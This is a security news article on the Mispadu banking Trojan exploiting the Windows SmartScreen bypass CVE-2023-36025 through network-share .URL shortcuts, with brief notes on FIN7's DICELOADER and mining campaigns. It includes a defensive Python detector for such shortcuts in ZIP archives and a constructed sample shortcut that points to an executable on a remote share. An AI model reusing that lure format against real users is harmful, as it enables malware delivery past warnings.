New Mispadu Banking Trojan Exploiting Windows SmartScreen Flaw

The threat actors behind the Mispadu banking Trojan have become the latest to exploit a now-patched Windows SmartScreen security bypass flaw to attack victims in Mexico.

The attacks involve a new variant of the malware, which was first discovered in 2019, Palo Alto Networks Unit 42 said in a report published last week.

Propagated via phishing emails, Mispadu is a Delphi-based information stealer known to specifically target victims in the Latin American (LATAM) region. In March 2023, Metabase Q found that Mispadu spam campaigns had harvested no fewer than 90,000 bank account credentials since August 2022.

It is also part of the larger family of LATAM banking malware that includes Grandoreiro, which was dismantled by Brazilian law enforcement authorities last week.

The latest infection chain uncovered by Unit 42 uses rogue internet shortcut files contained within bogus ZIP archives to exploit CVE-2023-36025 (CVSS score: 8.8), a high-severity security bypass flaw in Windows SmartScreen that Microsoft patched in November 2023.

"This exploit revolves around the creation of a specifically crafted internet shortcut file (.URL) or a hyperlink pointing to malicious files that can bypass SmartScreen's warnings," security researchers Daniela Shalev and Josh Grunzweig said.

"The bypass is straightforward and relies on a parameter that references a network share, rather than a URL. The created .URL file contains a link to a threat actor's network share with a malicious binary."
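The bypass described above hinges on one observable property: the shortcut's target is a network share rather than a web URL. The following is an added defensive example (not code from the article, from Unit 42, or from the malware) that scans .URL files, including ones packed inside a ZIP archive, and flags any whose target is a UNC path or a file:// URI with a remote host. The archive and shortcut contents are constructed samples, and the host 192.0.2.10 is a documentation address, not an indicator from the article.

```python
"""Added defensive example: flag .URL internet shortcuts whose target is a
network share, the lure characteristic described for CVE-2023-36025.
All sample data below is constructed for illustration."""
import configparser
import io
import re
import zipfile
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# UNC path of the form \\host\share\... (at least one path separator after host).
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def shortcut_target(url_file_bytes: bytes) -> Optional[str]:
    """Return the URL= value from an [InternetShortcut] file, or None if absent/unparseable."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        # utf-8-sig strips a BOM, which Windows-authored .URL files often carry.
        parser.read_string(url_file_bytes.decode("utf-8-sig", errors="replace"))
    except configparser.Error:
        return None
    return parser.get("InternetShortcut", "URL", fallback=None)


def points_to_network_share(target: Optional[str]) -> bool:
    """True for UNC paths and file:// URIs that resolve to a remote host."""
    if not target:
        return False
    t = target.strip()
    if UNC_RE.match(t):
        return True
    if t.lower().startswith("file:"):
        parsed = urlparse(t)
        if parsed.path.startswith("//"):          # file:////host/share form
            return True
        host = parsed.netloc
        return bool(host) and host.lower() != "localhost"
    return False


def scan_zip(zip_bytes: bytes) -> List[Tuple[str, str]]:
    """Return (member name, target) for every .url member that targets a share."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".url"):
                continue
            target = shortcut_target(zf.read(info))
            if points_to_network_share(target):
                hits.append((info.filename, target))
    return hits


def build_sample_zip() -> bytes:
    """Constructed sample archive: one benign shortcut and one share-referencing shortcut."""
    benign = b"[InternetShortcut]\r\nURL=https://example.com/\r\n"
    suspicious = (b"[InternetShortcut]\r\n"
                  b"URL=\\\\192.0.2.10\\share\\invoice.exe\r\n"   # constructed, documentation IP
                  b"IconIndex=0\r\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.url", benign)
        zf.writestr("factura.url", suspicious)
    return buf.getvalue()


if __name__ == "__main__":
    for name, target in scan_zip(build_sample_zip()):
        print(f"FLAG {name}: shortcut targets network share {target}")
```

The check deliberately keys on the shortcut's destination rather than on any specific host or filename, since the hosts change between campaigns while the share-based delivery does not; a mail gateway or EDR rule that extracts archive members and applies the same test will catch the lure class regardless of the share it points at.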

Once launched, Mispadu reveals its true colors by selectively targeting victims based on their geographic location (i.e., the Americas or Western Europe) and system configuration, then establishes contact with a command-and-control (C2) server for follow-on data exfiltration.

In recent months, the Windows flaw has been exploited in the wild by several cybercrime groups to distribute DarkGate and Phemedrone Stealer malware.

Mexico has also emerged as a top target for various campaigns over the past year that distribute information stealers and remote access trojans such as AllaKore RAT, AsyncRAT, and Babylon RAT. This activity has been linked to a financially motivated group tracked as TA558, which has attacked the hospitality and travel sectors in the LATAM region since 2018.

The development comes as Sekoia detailed the inner workings of DICELOADER (aka Lizar or Tirion), a time-tested custom downloader used by the Russian e-crime group tracked as FIN7. The malware has previously been observed being distributed via infected USB drives (known as BadUSB).

"DICELOADER is dropped by a PowerShell script along with other malware of the intrusion set's arsenal such as Carbanak RAT," the French cybersecurity firm said, calling out its sophisticated obfuscation methods to mask the C2 IP addresses and the network connections.

It also follows AhnLab's discovery of two new malicious cryptocurrency mining campaigns that exploit booby-trapped files and game hacks to deliver miner software that mines Monero and Zephyr.
